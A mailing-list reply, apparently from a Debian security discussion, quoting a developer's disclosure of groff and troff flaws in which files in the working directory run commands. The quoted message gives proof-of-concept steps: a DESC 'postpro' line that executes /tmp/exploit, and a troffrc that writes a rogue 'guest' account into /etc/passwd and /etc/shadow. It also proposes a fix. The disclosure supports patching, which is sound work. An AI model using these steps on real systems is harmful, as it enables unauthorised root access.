Continue previous mail. Testing 1 on Debian woody(unstable). Got the following 
message:

../../../tmp/exploit: /etc/passwd: Permission denied

Is 1 also fixed in Debian?

Thanks.

> 
> Este es un mensaje multipartes en formato MIME.
> --------------51FB8B50EEB0D33A488ACDC7
> Content-Type: text/plain; charset=iso-8859-1
> Content-Transfer-Encoding: 8bit
> 
>       I have just read a security announcement sent by ISSalert regarding 
> groff
> manipulation that can lead to a security compromise (available at 
> http://xforce.iss.net/alerts/advise63.php). 
>       The problem is that both troff and groff read files in the working 
> directory
> which can spin off commands in behalf of the user. This can be very sensible 
> if
> the one running a 'man' command is root since the whole system is exposed.
>       For in depth information refer to the link above, I have tested an 
> exploit in
> Debian GNU/Linux 2.2 and works as expected.
> 
> 1.- groff attack
> Reason:       Groff will read any "devXX" directory available at the local 
> dir and
> process 'postpro' commands execv'ing them. 
> Test: Put a 'devlatin1' copy of /usr/share/groff/font/devlatin1/ files in the
> /tmp dir, edit the DESC file to include (at the end):
> postpro ../../../tmp/exploit
> 
>       Now put your favourite exploit in /tmp/exploit (for example add a new 
> user to
> /etc/passwd and /etc/shadow)
> 
>       Then run 'groff -Tlatin1 ls.1' in /tmp as root. See what happens
> 
> 2.- troff attack
> Reason: troff will read any 'troffrc' file in the current dir
> Test: put a troffrc file in the /tmp dir, check the troff manpage to see what 
> it
> can do. For example:
> .opena passwds /etc/passwd
> .write passwds guest:x:10000:10000::/:/bin/sh
> .close passwds
> .opena passwds /etc/shadow
> .write passwds guest:AqualifiedHashPsswd:11215:0:99999:7:::
> .close passwds
> 
>       And run 'troff *anyfile*'
>       Check /etc/passwd :)
> 
>       Now, this will not exactly work when doing 'man' since it will 
> 1.- set its directory to where $MANPATH  or where /etc/manpath.config points 
> to
> 2.- change euid to 'man'.
> 
>       However, man is not the only system that uses groff. I've checked 
> package
> dependencies and, for example: gnosamba (configuration utility for Samba that
> will surely run as root since it has to change /etc/samba) and a2ps *do* use
> groff.
>       I have not checked their sources on how could this be exploited, but if 
> they
> have not be carefully coded to check this situation (like man is).
> 
>       My suggestion: groff and troff should *not* extend their paths to 
> current
> directory, *or* should not allow processing files from different users if 
> owner
> is root (to avoid a root compromise).
> 
>       Regards
> 
>       Javier Fernández-Sanguino Peña
>       Debian GNU/Linux developer
> --------------51FB8B50EEB0D33A488ACDC7
> Content-Type: text/x-vcard; charset=us-ascii;
>  name="jfernandez.vcf"
> Content-Transfer-Encoding: 7bit
> Content-Description: Tarjeta de Javier Fernandez-Sanguino Peña
> Content-Disposition: attachment;
>  filename="jfernandez.vcf"
> 
> begin:vcard 
> n:Fernández-Sanguino Peña;Javier
> tel;fax:+34-91 806 46 41
> tel;work:+34-91 806 46 40
> x-mozilla-html:FALSE
> org:SGI-GMV sistemas;Seguridad Lógica
> adr:;;Sector Foresta 1;Tres Cantos;Madrid;E-28760;Spain
> version:2.1
> email;internet:[EMAIL PROTECTED]
> x-mozilla-cpt:;28448
> fn:Javier Fernández-Sanguino Peña
> end:vcard
> 
> --------------51FB8B50EEB0D33A488ACDC7--
> 
> 
> --  
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
> 
> 

Reply via email to